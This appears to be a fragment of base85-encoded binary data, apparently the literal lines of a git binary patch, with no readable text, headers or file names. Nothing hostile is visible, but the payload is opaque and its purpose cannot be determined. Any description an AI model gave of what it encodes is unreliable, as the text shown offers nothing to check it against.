z;(5=l1kKfJXS-hKmBx(8#Tv%Mabbhe$(9w$qy2O`tt%}<*~KKziAsZkv^dlSBmRst
zVv{i1LKu}W&TmQ`BhDdFW5stR4fABD{JNCCM#Lq2xYrQr^|&Vs4jt-UeGFa~J#LQx
zs(^4<;%QEmW>>``P}W@pik<P!o5DRVv)3d?VH}?fW?Z(@Fd=qge!{b57qzDTv$M**
zf_8O1ojmY2%{xnsw3vq<&gl``9?X-XJV1zmBUmq8-wg#3$Rf+uyxs-wk8Wj)vq1-b
zd+Ik=x}^le)lyFy9M?V5>>!2bx@#&iA4qGDn{cIPkZp!8M6m<V8F2CBqIvkOp4<C5
z3DO?Rbs6!Qh3m=i>`*9~?P4DHy**7e(bp-J<xDRra1JUI5wW(6%@L$qHbHS-=N`v1
zRCSS&mhA*sL-*FYPcgsNgnI4sbMW|C4QJwD88%dI=Cu2rI!6FWj)J>&X(8i-E&x)p
zbXDiw^SzVBdlmew{AB*KFntD{;RneZ#tCKE?dA)Bfn`7wMJv4Q`P#Nh%e+IBxcf`1
zOTa>_)~#Za{pEp}uC6dO=4xM`f#m5|Hsk$)@D<^BHKgEczhhrcQ2T~@v9TNv>6SXN
z=;KSfhutu)S&w5w-{Frh2!g(=u4K4W(|MuG^eE!X-g|YWwbSp8JG6!f8@df{!2=v>
zgPFVFF9g4;oVVC6poY1+4?PEt>|tzY{vd?AZ`qi}3&9zI6vmyd8WFzAK<r{d?og0%
zo~=f(A1%sWZ<>gr{$fm16|n{8ZW3VMoc6ywp4BN{^>j@x)>^xZ4JPV$sO2~aUjMe#
z^bn7~2Z|uue3~I{JXOhFY;DYidSB;6g>_l@?vbnvqtYyhe<Z)YRt>pZXxXL$97Ba2
z*F6V@ua#n7mo>6jQ@B@)3CqJ=)e=uq4SqFRe88*UXvjX;Mos@xvjd9$G$*4xhno&*
zpBNu`9J$VolXQG|H|2y%%b5*pG@yjxe@mT8SHZrvD2#q2nDyY`(zbIud~B8s`F+@e
z_Nx2xOs8{9tk&tpDqNdm(fIFy%mVSFO(ZO%0wR!VcZqAK<92WFdo5yc4MfQ?FxR&!
zyraRC?nqlkZ<z)C+mMNl7x-S!*ig02$)O-HTycawoNj@Z(7mG74>^-ygvdPi|KT-P
zLtOXVmgVX@CwH7L(bQ~y*CgHb7*1`q{Mw}Vqhd@rQ%!F#XUSqyZgUeVY_B6m%|Rg{
z1}=VhfK$6X)!T&oaQJcPHsPr6K<0CcE0#X)*_YbJ9(=0^Os$o3p$0z*qwAaWKCMhO
z1M%KVx+6uTVsU0WB9Rs|xTKv3<0F}Sj!&L+b-hBOeg@QjRc8ja8;^g({ZnL81k-6F
z-!02{55;6uqzO(*r)faYiSXi_`s!}zGQPO=iT-nMM|xKo4(E#P&u%-CxC%9#-1gs3
zSj4ydG)LXN0J><R{zwOwP|ff7JygKnS1Md+gmMJ#z;2{z9KBe_Z5Zui&~;Z%Hf&KE
zX(hj+*tv&y{M&7F)ji2-CBy3quZdD2qA1Mnj>O#s5P$ch`PAo3?z37mT;{))F3)D;
zow?=29ZL$S%bvxgeV0aJOvBFm98G7_VLv(6#jj3c97Spf3J@KbK+sz^<{zY6`ghS>
z%nWqoN3HmWNt@FFhk05yWU%WyL}}r|TMw{~X!(DaPL;K{E9z#Nkq&oACd8;Fb_gnE
z97R?rix%7X8Zc)Tn-@Q<oW$oRtpK8jKPxdgtgr?FLm*cU`b95@$DdA`4$a5oUu2xI
zD){9cinnP$lmO!tWPllc8jOkFngUOQs9gS-3>;RP|Cz&r$&yJSZ>73i{jk~`QgLsS
zZT_@VT)%D4IsWR;&vU)jfIgxXgSkhRFRvDn&j614USVBa?}+KcsAKHe;~}wYo`Ep%
zD|~!_aK~6z8xDAzK`Q6y<*wZNnUjKR5jxgzII~{&DOE1HjYpBXIhvp@NTy0B5PrTN
zQC?yW40d6c4`D`o;*fPH&6+2qNj+!e#id6mPhCPVck_3T@A%RCV!NLm&$w{QUtj{v
z@?lJ0f^Qf1m$26AiAbv}PD@Re#28eFBYJoG>*`3i*ev&N!VYId3l=U;%5Tl{r%k8J
zw5zkt&F5ZNFl$@}_tFMnx;>Ay?AKoFFFcz$8AAe6elPlREd1(~?L3Ko0*n9?BC}LQ
zakb=E6=}6FPJ*_uU<>A%D#hw&&Gu>{ETSdbpWn`pRdi{U4~eOyUDeEba<f(oJ=t)x
zfrkoe^GbeCob$ofp~ywee(0;^>9Cc`dAPSmw&mWnhsUp4+<_M_<kVdEP2@SI_NAj%
zO&_`^+}>|GA&~w#g?rmtfi|!-Ig>S;DE?V@&02>)wyGP)ONue_3~q0e)sW3m_tP-%
zaT1szWUw((*j@-D%|Msr$qyt>#!k9u-B;360mGOCV(es*H{+h7J#mpw&+96eR)(3&
z<Y>=@eGDb*6p_~iYXBd2YxL{qjY`e6r2~H|qew~LyQc|JE*?v9I`R5;Dz$5kS7+<t
z=w;JFAhRvs9~7=Hwn%e|zo7Ob8Q@C;^2pYjH2GYo+ed*6p2&V;v~&80`QS*#RL`?j
zNs8}wqmBidtG@~o3Y)LaByozHb3D$K61og*0A1NrP(t0?IqZ{^REI&qT1S<_z7-03
zUdcT|vr$ggwlJ#F7u+gO<YpX(M7OASN`9?rkpfK%Ij41dj&zVCpLt?0R}@P;v(th<
zhJQ$?dx6IqCKB$5f=+g#h0<KqlL>ImCdr@zj~ZxWATK8j0)M^Pq;+>XE=IIm4dfa5
z!&`@_<Rk6sRy(&^k%iXBFKg=j^oI!LVs6fD^|!Rg7O9@^1-L1QgtKI)a)*I&<Ax+<
z9jxObQ}oaBNlE?iW^w4?Elq`T%K~+tK>GLD#<x_+@BD&*OL00Vh$=w&S+Ne@m8D(H
z3>3x%?5c~}sORjT2UU_f<gh<;5nBL0%FsdW#T`U=r8vdUVkwWk>baaR|9p`DtCe^k
z766DpHEvEnpixNl@R<7C%Va8^maSYKh5-0?+Fv>&7`Csj+tH*C$qO3%mDY>vi|^4w
z`;*Q$Duxy}DmagSFY<KGwfdSbgz-BYstT><%-!?OK&(DYB^_2SM$U(DcmRCVb4Kj`
z{2LJVMuGMt3D`dYclEqccH-9T2(h&*@gJ8!axvx^YcL>kdGM19-U8qOOT*F&Ghm0R
zg2U5PDY^OVY4vd-PkjT?LG4sem7ZPf0IFx;2KdYeQ~P#C)R+^c8(ju`;cB$1gLLUj
zIF80Z-SxdO!L~4h@f_N~iMgk=-I4Df4OY{312dO9?GTG2tRF_rv?9|0LSZL+y9HHK
zz4FPLv3z#o&VlJxo_(e1o&CgRR`p-CFYZx0zBtL~{i&uFTTr56+u*0+1aff#3^qSn
zXzq6_ukDoMO7o!5-b#i?8+{PDJo2*L{~%XlO0t8bu<3C{KM&C?z@CIM=NA%TmQ7UX
z&ack5l=d;5UVk!hx5Qp>H^x3DN3R2<NNpNk%ek=yP>r4DxkvVbbxAXOTD{{^Bo`~@
zF10+HlKcK{Gous{G;jV>=1sQV7h|O87A)OG+J5)NLMQE4V9MVq6NxNcmf2)+sF|P=
z@lmCUp?s2uQ#e9}bjvhcP!1Sw8w))w0Mv@LS~+<8g|YaUt(kfkq}0_f9b?6ahoU%U
zw4d>x-#(U$^e!{)Qfdz%ocVmr{w+27dHxWNx(6#7%Y*popx?{QN@~m?@v*WW?R~{u
zMPyYdvqqp(S|GSFRU7GwmF%dgt#3xV5aD{FUb~yCM24p!X!*uV^~n=)Ob65|g?UvB
zizQ=XE!^{@npiCLG5w%wV~-Ruj0TR9I6I!bu7z&GUedQ2rj@z3g`G0#;kR91Qg)DT
zPwodiT^5>>Aac!9qr(I|Z2P_X)RU$w!}IL*oKBHxN(3HMMK0|fp1#5_CbZb;56ECT
z%5X_F0cY|7^rDIP+TG7x=8t@iK-=YLUkOs$F;(LSaUo*6(M9vrWUBIw(|U4c!n3?c
z_%X6LLPYQ?snmL1`-!jaVm^qEaRII~0#mqZ`c#@t*^7^*;wQMvMm;@`h+fKbRw*4R
zc2Zyd5X+1*n_k5!e_I=Sk3q~}9DwvI^S#bizuj?o%?1$LJ|0-EgnJW+9-|%1_ZEAs
zQ2o7kX>Ay1J<n~YJl^U%?bXR3y>Dks=OmsKq$r+K>JNcjJVElLu)6q`M?IAgwEJDh
z!E$ke-oDPj>E>IF*g<hH_xGGt!WEjyB^$MALJEE4qx>%sFi=S#VYG6Sadop|^v6aw
zLr#@ro3{6J`&2fgA|f958XQ|>CFGS%0@p~k)<P*|k%Hgy=thJ~lRw7>!_UD~XK;tt
z5ag9zuIK0Xi5J~$CcYf60^tkR*2qsch+S`%KuzMd?}w>mw3IiiTNa%>QZjT1WJGho
zPd7XitAI52I3!#}*nhOKeN)kTcm0lhhgUR|f!>EF#@3qC1IK-I4i#gB)q{u?vl%Vs
zl14?Xen~T5=95Lz^1TPc(<FRSum=TO7*zTRxCl-}i(nkU+P&+4@Y=+m65Tifh%LUm
zy%sz!u?C7yxANtM4h>=i%tuQGpa26Uli16J%;wChg6K1l#)Pj(h!YfAQy(O<aqG7Y
z5ae&Ve<ax}`eDDin`~dIXmAk7-IVyqb}Bs%y2<J*4X1gM5hCJaI^=d(%U(neKI^g1
zmgdKSzKwxEt>suwB-SbC)<|FzLoSaq;HE5BO9{qd$>nZ}t$p~KkTybkI*XFau}QTR
zcwa5R;28}MMQuI?qK@{?!a3rLJ5&bA&SOHh>kThf9F`_bIrxQskirgHG5oeZaqbzV
z*@R+O1;yn`Q=&i+Lb~R)Z|kGGkwlh0VkBChBCH6B?9B-S>#Ff9<xVg3CV}{;EmH(-
zfLid@L|HbSn+=D-AHb9>qB*N)J>6WA0Qfx)_o2d%<A{1#FaM0ArWL9<tq`bLc>{Aj
zT0Mik7J=L(0T>`H3eu@_f5ZSg@k)2!>uKeWP?=HUy?WyX1V7kWLMClEJzarrzqE9K
z)_^KM&S&B6gwo=N+|3u!nl7lIuq*{CqYoyf85Wwy*ImFD&Y7u;C*Qf6d!knvspWI6
zHuo_g2x9DYS#^(^2RwnieDR9Pg&uC)DjES8Kmy4?B6_p^0e%-G<_Cf2_Q`#0S0;C)
zU?)&+rMO^dj!prDp`8KRk!(oR)2M^eaQ7~H7m9|`TdW4+Mq{3rhdR{H-ugA{cG9Zy
z8MlSinn-WFOR-%xa9i$AV%E%6#yk4h2n>AQQ#hIbzLMRC<Q_=jC%zx8O_-JRWK}i3
zvxf3RyuDYJ2Bghn!X(f?#RfAQvGR-qL*1ST#L(G}+rLF$wbrnpBk|nD&i*i4*bRvu
z-)j;zYM*T1o-vIOg&?)Tb0MM>!W*U1B!)#%?aqLU!)(8_6k(gYVr(NSJ{;hmjRh1{
zKR0D>5dnIXsu)0QZuqpbJBrx}^*(_Q)49zd&N!nWhb$npH@SDR1!k<9IG{?{!NqSv
zoxK8vn{d77JI!Mzj(NdVe8vEAPb$+Zj^M`?v@4$;92I1A7E;cHpam%I1ZF?A|3S(6
zpju>=H{>V!)gFBxD_T169(?xhJ!+xH;OL+!Z>>Mttn>_5q^;nKZf-O$wdzy0H+;ui
znB!cJ_D{}p@X_F|9{VTZgUHv>)#+YWEVUQCu`h_s;BKuZl0xQ>x`x}o9}Eiz-bv9)
zCn^cMv<H!GY$8oVZoNz&fDpZ);rm$VrpUD0$xm%qZv^H)*krg+|B#aF^Yew~ZXeT)
zYQ}Y|mI`f^GgSq$)!qE<5HYh@_<RU-Oe_J*cL#Eg1RYWqQ~li393dt7nD><q_ZF{k
zH?P*9XA73cKUH7M3J}h$K~5g~k}xwN?t+Nj)1pe*NmIxxSWct>y8Kqudqz`~u~(yk
z$KkJHQP@u~=zh@cW2=+SbdRIgtxB%NDUjm{(}+m;IrOy`P==sSk{6xk;8nm0y4$Vs
zs;$u{4C^+>3`>5(0My8x#1$N}I4@Ycnwyf!d9TU8+vO)18g>&&MVY=yPrL?-lN2^|
zUMQ96j6NWMSeD}0OTM7%DAlilwK{~wqqUL5LVp-*0d&K3B_M&u1{sEr3QFK>i0zo6
z>W9Fj%^(1URxRV{M`EMS9Wv^;9Vt*&u!n>^oxMz6mTmi;+qM@T1aUrX#Nro>6VKrX
zBl7ibh10s7pXodq>?0E4GeaUV2>*`l`$k-!OkbUyuC&<l1~s%d2dfL!cJH`-n#C=C
z9|LFZa`2@Kt~Gu)<JHM1p9Q>?=7-orHM*tncCE;9Be$Z;z^q{^?Yy#`jI9XolEdiM
zklql^;+LCN^B)dx5as>lAp&g<?RZL>B9gh6!u5Kkf~40`SEPPtdeDi=B)v@CEIkxx
z-p8$BREaa7tBsW}=sFg-mo;xFJ>v@-$MxjOW3Y7~A5RQJl<fD|410%JHN`~&h13%+
z9f=x~9|7Z#bou1k-dSCg$$#AIVV&uH(94<%_t7_z7UVeGnACKhwymjzL=r_xMO$24
z2MTFWU^>5_lrn|{U$x)U@YX^Ug7%3^s$+PSdbIUzS!Ou3>2`S}^_#D++yquq?3x78
zjLBgXv%q6uhe>JnC7<Y_dI)o3TY)2*f-oWT@}gks^OiJRRH({^f;$XOcuKPMd{7{}
zmtd^$jjw=qP1)$c=|Zxq@FuT3wjkBw)o03s(yY(^G=3arb<4@tezOl=#y{zL|JVrm
z!3$oLNJUm^j{We7e)YX0noG&3KGM!;`(I2g&x5RQ*Dh7y3O0G~=zQcm5@Y8EW9}Mt
zJQ%v?DPGDmfK%S^`{Q~oM=|+63Kf3$0(P{iPp$Nt9A?WfgnJc`DejoK^F$6+Z1}oJ
z+X&Pac0LdxPAx_thx9Nj{8uWbW|G*OR})m-T3;19Gg}K3_q$o+3p%sso8$-bjl-Pi
z6B;_s7KI4$E9AjCYACLZhOmYRobgG(<OebGJ{qv<nSTJ})Db5gb0(1`LBxv*euO^x
zPM<@ICxZpXt^P!C^~YyyyKcQ0Bfth`LDy-LF>ER4oJ7Ci!qXv^3@X*T07~Hg(r?U9
zBBeFltl-UhHL$e%OW;8$i0|T0FuAs{Hx|E>4{sX__HKU?f(6Z(4c}%8ZpDXg9ap}2
zE=aa~i>H@zKJekk?o|hoMMsNP4{x_0Kte_ZZTI(PqVguxM#P+5mo%NN!JLv&*FeEp
z81-;M(ub2|9vPGR$nUG?7KyqA0N^;+{qa4|(a9p+BV~Yy%zkJ}d>;Zg6={&Ew4EOR
zp)TL3k^+U9)0#s>SU=#&w7qyVKeSH^e)C=0`F$Iq$Az&k71hP>M;Mm-vjQ7cD5K(V
zh9IS!nSizcIs*Sk=m*-(HV!oI+F@{V(tjLSw&yq!53)2;MU-^<hPjKmgA!&th0af1
zX(sQU5?uw&6I)GJ+a8qu;);=IjWp^R=bY6wzsnS?H1+K)W$x1hcf(EAMiVkyF-&L3
z?-`d_dgssQQxCal^kKE;c{)FVG_-{=Qz7UVvG@X8#v7HZxuJVh_i_c=2+=^-h@~-!
zygA=cO1(6R!nyX)UuHQ5c>D^&-SlY19Vx%lbE~4c6p=_a@U@t2{bn_WfLe;9&3IPr
z1Ljs)7ke5!qs1W=+^TgqaEQ^{=A4Oxsf&QhASUvlsy&d7OHx@ZDVL5L6jTwO(>x&A
zm<!_HY1yVGdNPWac-sx!>4(~6^Oabjcm+Ng+P@|NlCNVN*jvxGiWgoU4G$X6-XEkt
zZ8pvoGKyVQZKLZ*T1+Z9Eo_hH%6=HV77_>RPHd}2+#~4zT>2l=BJ|d^?&*V$9uLuG
z;Qy@0o9{j1owmrg?qIe07DfW=;KLZGutWF*bs*%8-d*3wBl&n@3ToE6!1{s4c+u6o
z5BN!n$qrj27i{FXN7kaHAxafncB))&IR?m_B}K1J7G^4UvZTaaywWEmf=e#FiP29K
zax$spkr>amIP*xQIhwcwr6Ne0dfjRF-2Bd%rdn;WZm{TDUbfWpGnRYYUU2a}V|=M4
zI)WX^yY?Lpes*_0>Az~@5HcWq#$P<QrqZnYtCK+gm5+yw@*;<zkr)!IJQw6bmo(08
zl`R(*BC>P{fNgNjOC<E<<AOd3SOr;D$FR~IriHM%C5x>dK%nD9zA<;qz|ik&zNi33
zpBRFADmbKBRny1c`O(7v@dUqIkhCxy<x#LkjQ-*|*gr3Sh+3}EBnFrRx+*`|WBeiL
zWE@j}l@gwXDG38OT96D4+2LzcWej2rQMd}p9G9jxqw4_mu%f4q@3US+DF~Wx<D!lJ
z3>p0N(?5rqI;4jq=2bN7aK#oF8O7LvN-<;YflJ^E{A{fg=dwCc7+Qe!$o9NWacw6e
zFhbbq9Z4BZK|kC?BBZ>enY48u<U`<PDMNzUPc<_rx{a-pv6e?AUPP-ke!LW~53`@e
zmRXg|b;4w|!4rXafA{T3fldj>&!4pF3)*?lW}j3~v>p0;iC#2D@nSlAPwl(tR~D~`
zWyUagB~u>#sJ^eoc>LW}MoR%{1|a?ezGoIQOL9mo-+y!`fS{?|!KkT^)+#4<SSt%p
zHJ_2Ao{sYEV2lEyb<zw#5f>?Z(u#1x<LsLF@|C>FQ*5_`JPnk?z-f{C+z$xU9FV;P
zd#=k#7HeBp<|KkhLPkKIWrC}tZ_9@Yi2QWG?u@-1c(vA;i&tahf0P?n7P8~jPy(>Q
zNp<1e?$>Cxc5+r#N6uh%KLMrLgjNfN2|i%K4yccvUPhEhP-+y$p5dVawX8^#&}t&w
ziZQ=&Nmf*&d*Yk8lY`_ATX#1dBYecgK>`{oq_75MIeOX*PD}s+nE^5qSdMKX&%mtc
za8HeUZDCrrDs|6ryA`rdy$IJ+nV0e^3|RQvRFMC1AKU>&vHFmZYOzyR??xA$kmqaE
zq$)MSQ=vc7*YY_xa3L^K9U%r}(A|-lTbD<Z77R7i1WNz_%^e+-NvK%Qd;%PX__wm6
zn%z7N58m+I&j-F(?CYosBZk=KVa~cN9cFo1`p;@4LS1_J@=*wh{HirIbO_TV%OYa!
zb(b{jfh`XA8%N3EvuT@(FvrzV7WCrx>6dZ`B*<AtE|=(>jO;u+jq=IiW0s#aw@Yuk
zP}=CqjM8$4!G#qNSD89UMPyQYBI#BtQx(xa3J*Pwg5xD;NX+?1&$P>n)Q^!BPn0^H
z7l9(3jkLC9Taiwj;5QpVDCm7OQHBljE2Fu?ofZym=_p|TiXY$ecRpQ8=(8?qye~{C
zN9`@8LJkvElTir{xkJyl3y^CV8?NpBQouArK*ye^WqX0Y;5UZ!qHG8_6Yvnw=M$g`
zf%JVZ27psf`ybB8&4c&}Tj=i`Q!+7?CB>x(I;7DOxk?^TfRT!C;)D`%wh7Sbj$;pI
ziP|XVTd2XvI~ZS}qXYf%Xlze4t;mUbf;JM+ReKYpAHo4S4e~Tk_n#kkWt<~77F}1i
z)f?ij$jHznMpUcIy$utZjuJ)~MrA9{6Sjrzt$tgPlM_fEtQvaU88m$nD0Z^Y<E!vg
zys!yzho))l<UI}h&v#EMO=T&%I+$<H?``|6hh*-qq{&<ym;#4FrBUumU^~-UrAAG-
zY5`XgHsCIhMy^;-aB@^-ty&C#lMGC|A4sAe-ZnYid2%;M72pk>XWmO-w)ynqxi3Z4
z$T;5z@$c&i#S3P$04Km_z~3GZ$1Tli+<rjRr#)FA`gzn_dW+xJ@qr7LH4m=!LzJs0
zn~O<c(YA{p0usMPtw@AZM6ZU_#S8k+;byQ95Gcs}cW#vdHdINvb1t-KC1H|SuuqRw
z=^+3ve9t$2+*Z_MN0#xr(Ff%9nx0)oo+nu7C62%xF=sbB|D7{GT5!62o-Yu!u`F;~
z)0OSzUus$d6sMPn1xtwWYZ-Q|P7vOS6x^WU$O5owA6C89M99Lg#yLl5Zqo-m(`gI)
zLlwFZ7Q}m^-KK_12bXxzIb0J_>Z3c-*+(k1vHRo2^e3;qqv>y|cgDp=0oG_?b8Slv
z1Wvw7p3Z=LIwwoaeLM6)cC%<}Dv7Dk+Nn3^y?IS$j0-_op{pHF)I30!1dN2eh!C{n
zOtF6L0mg_I-1|WgGI@koZH${6OKJ=h_}l)`%X&fHY&?bEGKvh>*LcpY$OfFNpM5h}
z&mv^#-WfT3TL@oQU;xPnB=#hcf$l9lI#(xgR1oi{&m4bH911<e2t@*W&WY01T4F%4
zi5s1KVph6MEa#n;3{<cfjOYXckvp~@c3T2uz_Y&~;qY}zjf30II=<JaCR0dlk-r6O
zwVY$9q4VSqzRY|4_tQvlX#&@u+N9et*an&TP*8djo8c8Jo!q^H$4xKt@HZaM#W1%f
zW8a70O+dC&`S9#34(4K~kjcd0QYtWr{R5X1_G@_=vbsk16HK5FVXQKZzL#mXCtm9|
zB<r|EB?xa{B2g^&Oa{3dhNZyg$$w%(|3M<)yq%6G`n|Y3E!ooJY#1k+i00hnFUNS5
z`IC6;qy||U8|}t7Mc%`S&QwIvXQ=zZ8gy-#ofk7+;690#5YWjWS%1*N$fLUiQEYdY
z%)^x5qVC3TZu=&h0hcD?$EPnzzWM<m1ooN3r6GzsWK;P-vj=-pDPpq+IM{emf^++!
zL8Q8;KQNC4_@a7P2LTIz_VJMBnBiH9H#3x{O)Z&ou5y$7ZSMl2ku21LAm{WHs4NdX
zSPqN1cgllB+jRME4XjwXAf}qk+ant%sqA7PzEI8TQT-+mkCk)YOat6c?BI63S(D}^
zt}43J`qc8+G!6*5E?tdtRnyjpys(^UaZ+qZIU+FNvV8Ipmjm`h0P;z<Z^(IXLlTF3
zi862)cpCa>+272s9^sz?RK90g0{y0jMgn96`{a=HkB{2_Qcd?HZs9=mm9ogqZ(pA5
zPFuwYPJ6V435iwu(j5ZsaC3Vt!>7Aec1h^&Q|M;v*H3sd1O*XdOz(sdg}Dzu%z3L)
z$RbBRJ?Leuw8sMz;ke&`H5^qyONdgjr);p|NK@(gI31&;+~{C9|NF6SdO4}l<ngjB
zY#(A{I~&~tJp0(Dc+3yHEy-l$nsco8vjYi4mOJwDr`Y9H-a_pUe4#d~<!Fh)Io|=w
zJ!F%8AkikdjIp=1d@fG^&Rg8kq8nIE^zuo>Ru_+IolL6r1<{R+5_7k+x@~}U;NN{w
zqQlDAkyGIh4xf$ih^#1dVly3tMv_4)GsB4wUqU9G_d?EAf1!EviFFn0@(K6Hz(2*k
zNj7O=$V_Hoflfo#etMJZxnmWofSwrEdO|0?h$Wy()Fm4_To7#O%SnK~x8rmL<baD~
z_7}Bksg|r<79goPIx0diIeV^Q;r;fSgusrM;dCc0D0(hd&)#>m@-C*&nGKW=lo&Qz
zW*;_f?YP{<gg@%I`rt_ql??FCv}5RMH2%2yb+8EMq-!#e^KRSr=`kp=&HwHeU6X#4
zcmz_YxWH|WIcy;F>S8V<j4<j%j)e>JmFW1+)v~8lEIpEcx8=c1dKg@q%I_hnbKw_L
z`!<__*UlrKpOX75=rf9LFz)Q!SMP83^LK)q^^=b7Q!o>`#J<2YN<G;dpoA?x-fub+
z+>yyLNB~@}<$uCDfJmfhQ~et9>!<T@;AP_ZX5P6iW0rFGOPxsAn&dJ$tb3~3wjIWj
zR8ro{!6ie7R-Ajc3mp6v5w#1GP9=T=b&0c5vIwnq4P^maa+6JxdYUZ)UGEip%&#PF
z_b_j)jd}Ci_Jg&pB|^@VR5^FIWKXJZZ3*wVbqXkwpV^i7Kn4wOb8f-aTC1oyyvN?c
zCKmBfgd(>;+>eGdoM4(hg$@F$d$H3+au=`YqoJI@1Z=;Kj=novd|npM5AzFbYe`@t
z&o6Ef$2x6sC>2kK!pZ6X%h615qOT;CzklPV^q7dKoei&>m1`Tg>Q-#XG%og|b*M1|
ztjpnTK*D&qAU3T9C|iMcJCs-%f8MP{e&*VY6v%$~D}!g*Q@s21S(}REjkoefNH79!
z!#c#_3FZ*7MC%l9>!0%HKR+J)XpVeF`Dedug7Y2|8azQ4acJX5%LVy$h*@rU@{gZd
z2f8Vw)dEW26xUc{{+@~(krwRoulR&b5=Y^EjPesI!wF{f+|9hJ*k=~v8F|?N)xzjO
zq-`b8!C~re2M1f`TWy4hFybEQ9#D(vNLkcRaD8GUoo23&f&5SV;{&pcPBHs<`e$9N
zu78)!lt{1_U^_(K2pL`$gMefnJcm?ODR)YG5NW1~S^`wm-47???*DViK&J$C9Nr!k
z9=O<9T?ChdNN=KaI6~F0{;d-bxCDRy`xJbDSL&dZQUH8u9&=eZ4<26+blp;V^kz+j
z{lhK+k~JVL0Fw@b`Fn62M!s=5OrXre<*6Ok0R8LE^c6Rp#k+|Vmi7LIb{vZhaFeY^
zReWsy>M6FO2U`CcvPX};;K4>s5UbLL%MYXz1R>_0FuxSgUm?;`2*9^igYdN(7Q2ir
z+x~SFd?bvm13zTAJo5VJ7XI*beeEC02Jt(x$%p^41=c3|@9O0<eYv4?0`=*JXDAy^
zv|b=ej-PDoH8g=N%k&=wnkC>C9*pa!(v<xAk2pcD>8J{T8f6_j8IX!#MoV<wNakXB
zfEFM?E1n7TU&(MD77lN%ijcvmm>zd=|FcOT4XKRM&F+UT#+sU^<V?FGy`yjP6*fK`
zfKsDV_e@70!&N2xZvU@h_sb`c<=d3clR1}_Mg~a><@ADmmOvdn$rcE6ZrH6ioNIRG
zm!LMn8q&J(Ilb)OWets9HSd7|V42pQU?)#3V@pMQHmQyZ1@o?Cua~wGFS0$)5cl%@
zZd5k!0o0;K{QgN;#y9|q+rdokHB{kwFL)?a&!<Nt*C9T8Dy?wB9%*r5ht*kjb1iPJ
z!fk9ZJk=>aMR8+RebG04un#JwOu8qtZE(HP)`*{<8PV5IF4Ta|n2c0u4j(6m@c+f^
z5MW)b$vtSN|L&lkTnlTf;<uQbjFOllAgUW7zK%4g^>JJPxqyq|KdU-GHNHPQZ-hj6
zOp(EG(_cct#QZun3kU<)h@p~=f4yHiM@q=edK2EfjnJ;m<@^*NN0>oU%Fvk41n}VT
zPbritB1edlNMT=0Z=@DVq~4hJz<Nz^wt-S8JYk-`LhzrQl@W(Gf8du{brT?=D(-__
z(1B{0XRvzYd;pRy5&qv;gC(RTh?E)4;Y^3QyV}W`Ld?%Kq>X%W0GY1*yUjsTUx2ZC
z8X-~U>$IrirMiuPU?#NXPfs)kpC9BRo59xRq4>=?JgCdSC;0E32AG`^<robgI=|!&
z8Yh5W2VO{wRr_9b&-@RMI+c?HI}^u$nt(^3S4<6p{ha!<NarUgbD}VTDFsh`3QPde
zK~#)iy#h;XuHqkKhe`iERKK{@)ITry{*E^w=I;UIGowM!VE$kzM2@-_JmMJ+1v8`B
z={CLrEB64KCE}CXdxs==Zj<8l_dhHKn1B)}+1a_D@KRS=H1We>ou-q61p}@=$A4x>
z09)U-D$W4W!-BzwcJuV`^@4w~#V7#!u2j0im*2uU^>rnr%>Lb!uig@rZ7J=QJck2c
zpQ!LNVV2)R&!XYk_gs6cz`BP-z2xa14bneuVCaf_Z`wlvH$Vg%DCnfpxh_V9E5}$q
z9}0x~zWEll@nz7Ai{*dOuo8|pZ+Xf>D)88`029Z0E?hzr{p5x$wc)jQ!O#rHY;Sd?
z`;Qe)ov#lTcvl?;mWm@T|BCm&RFnLfsjn%l8rRd(Mm}R8gOOOqGqGkK?HAfsw-E;2
zTqVE)3V}{?ps1uDhY>M9n_wt&5*WC9bdi#NwJQt?{7%sMlTGJ|JxX}#woL=xZoYiy
zf2Z%?J%5b@;L7}h02AV;b`6!j%`^Et$=p+>$#I+%^L~Nv%G3_u0DjLqyV9_K`Zy>~
zmV#}ySe<CGS8A$<Q$3e;8{tf4^_PdT$V}-PvPj#pDDK4OmeuQvpN_R<@->lP9Ekoq
z5jHpyer|_rEY^i(0sE7=w0I8DHvR3~((!URRnrQxNt^wK3;;d6^`C<GtM4Z@ONX@A
z2G;_Do9joVbR^~wKwU!Arb4~9qbXUbzJkw>R-z*%M!z(2J9VYrZxQAF&)o6(NTfh*
zb6!`x3m5P;^L@2{J6bt9j7L220RTvi_NNWU{1Z?7m#^^x47&jrsQP8Lnfg(Fm&lu;
zOd9k4$xlK$wM@5biT3fa2en`UxH1`c2&lRphD5Ar+35BDhNkbay@B>PfwU}=A(B~=
zb+vVb)Z*aZsXCChB0T7M1p{K5H-Dt`MymoG+E2ju>?cLrwU=~F<~-bIYYS^Kar0-2
zv;YW6e};>2%)86HN8`#y=`VaY!gP#c1Lc3~|A1`%Q>jWgk>0`+I~>zA2f$&Xo+`-X
z!R$C#KS43e<L!W}m7p1T1rR&I$?^XS6$o+Mc~XW7-Dy2V2Xn_AmOinqcQ`NG07$Iu
z8Tl&>urMQvaUx&s4s{9R%+6}MfM=@vPPlCjIQOqhF(H|70yqbG+2Qye)so?oL5g{+
z+F6QKT&DNcokWEz*UkL&vrYa<o|H(iGWwUF%gzQEM^xk=8VE9B#y!!cgc@Nuv{xMb
zQ;fzzTChsoYvkVL`jB|<BJuB-lBNp-&nx@7i~VC`)h_A^hQF59O!8JojY)d|7kU;b
zfI@^fD`N@)pgjEPIXDHJ%sB&|dmxpd{*5b`&!Lj()CsT$2LH1MpFc6z{Yp){S=uDj
z$6`8Z<j5@QmnUG!GQP|!2$+G<`G`AACAzDsMV>m*PN5a0^EfYJlXx?~J?7|oppg0^
zRu%I4yVn_q7sSK5kI)-s<SCg>d~xC`?y#O#4^<cjNSYif$y+gQD|BwWdOTIFTwO4h
zY%!;)Z5US=%24o|VAKa5wb7)y{t@|vY?~9mM33R2Yl(!jx==B($z|l&H^XHc3spe`
zBz#B+v5y(I1eC=$LV7ZZPvEjT%@Jou!5G7$m0n6et>a80hsw;2D|U})Hk5YR_b{GC
z)%)>jST(yEHR^#!l2fncXk)l;tk-AmA#Js{!ojN5_TQ(C@Ey93X^cEQeHsone#)}W
zFuru#_A1?|9lAPI<@@Hz`B+N?fFF!hV|pb|Qy4rQrf5rQl*~$yf*n1~VKN~5jB=K6
zZ-a!92%a?SXq86;&f`hIX8eRW97(6)@ua!a>+mzc2&3Zu`2i0ceA)C$dc#3y|1qc9
zN7Wk%<3>z5$|Z>GV4SHqPVMiRFI>$9%`HtzPsz%Mjr^_g_1Il(e>dc1lt-T_Qaely
z3r+Uc*+FNLVcbi#OCdjA42d#xtGa);%%R13pK+TgD);<h<oej&I5z|{9<$ez4l7U<
